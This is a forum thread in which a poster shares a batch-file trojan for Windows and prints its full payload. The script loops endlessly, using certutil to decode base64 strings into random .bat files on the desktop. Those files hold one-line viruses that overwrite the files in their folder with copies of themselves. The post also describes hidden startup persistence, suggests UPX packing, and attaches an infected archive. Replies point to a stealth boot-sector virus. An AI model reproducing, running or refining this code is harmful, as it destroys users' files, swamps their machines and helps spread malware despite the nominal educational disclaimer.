1 (edited by RCV5 2017-01-20 20:58:56)

Topic: Self-extracting Batch Trojan

This is a batch trojan that decodes a UTF-8 encoded executable file (a compiled batch file to be more specific) that has some simple one batch line viruses encoded into it that are also encoded with UTF-8. I got the idea from the batch version of the MEMZ trojan which acts like a self extracting archive in the sense that it extracts MEMZ.exe to the roaming appdata folder. I used the cipher built into windows (certutil) to decode and encode the files into UTF-8 encoding rather than the javascript cipher the MEMZ trojan used. The executable file it has encoded into it extracts itself into the startup folder and runs hidden so you won't see a massive cmd window when its running. The payload is very simple, it creates simple one line batch viruses on the desktop which are extremely easy for antivirus software to detect, which in turn, causes the antivirus software to constantly be working to remove them which takes up a lot of memory and cpu usage. Clearly, you could make your own compiled batch file and have it decode that instead but I decided to keep this simple. I'm hoping that people will improve upon these codes. The actual trojan is too long to fit in this post so I could only include the payload for people who copy and paste. The attached file contains both the uncompiled payload and the actual trojan. I would recommend converting the trojan to an executable file and compressing with UPX. Enjoy! big_smile

Payload:
@echo off
:a
echo Zm9yICUlYiBpbiAoKi4qKSBkbyBjb3B5ICUwICUlYg > "%temp%\tmp1A7b.tmp"
echo Zm9yICUlYSBpbiAoKi5iYXQpIGRvIGNvcHkgJTAgJSVh > "%temp%\tmp1A8b.tmp"
echo Zm9yICUlYiBpbiAoKi5iYXQpIGRvIGNvcHkgJTAgJSVi > "%temp%\tmp1A9b.tmp"
timeout>nul /nobreak /t 0
certutil>nul -decode "%temp%\tmp1A7b.tmp" "%userprofile%\Desktop\%random%.bat"
certutil>nul -decode "%temp%\tmp1A8b.tmp" "%userprofile%\Desktop\%random%.bat"
certutil>nul -decode "%temp%\tmp1A9b.tmp" "%userprofile%\Desktop\%random%.bat"
del "%temp%\tmp1A7b.tmp"
del "%temp%\tmp1A8b.tmp"
del "%temp%\tmp1A9b.tmp"
goto a


Disclaimer: I am not responsible for anything you do with these files, the codes, or any of the information provided in this post. I am uploading this for educational purposes only and strongly advise against running any of these files or codes except on a virtual machine you deem fit for testing purposes. You have been warned.

Post's attachments

INFECTED.zip 35.12 kb, 18 downloads since 2017-01-20 

You don't have the permssions to download the attachments of this post.

Thumbs up Thumbs down

Re: Self-extracting Batch Trojan

Maybe you would like to see Dark Angels virus 'Blah' in 40-hex. It also encodes it self as ASCII, it is a full stealth BAT/MBR infector..

----
JPanic - Johnny Panic
Ex Immortal Riot/Genesis, NOP, Team MiSSiON
@JPanicVX on Twitter

Thumbs up Thumbs down

Re: Self-extracting Batch Trojan

Send me the link and I will check it out. Thanks!  smile

Thumbs up Thumbs down

Re: Self-extracting Batch Trojan

RCV5 wrote:

Send me the link and I will check it out. Thanks!  smile

http://hackipedia.org/Operating%20Syste … .utf-8.txt

Source: http://www.textfiles.com/magazines/40HEX/40hex014

+1 me!

----
JPanic - Johnny Panic
Ex Immortal Riot/Genesis, NOP, Team MiSSiON
@JPanicVX on Twitter

Thumbs up +1 Thumbs down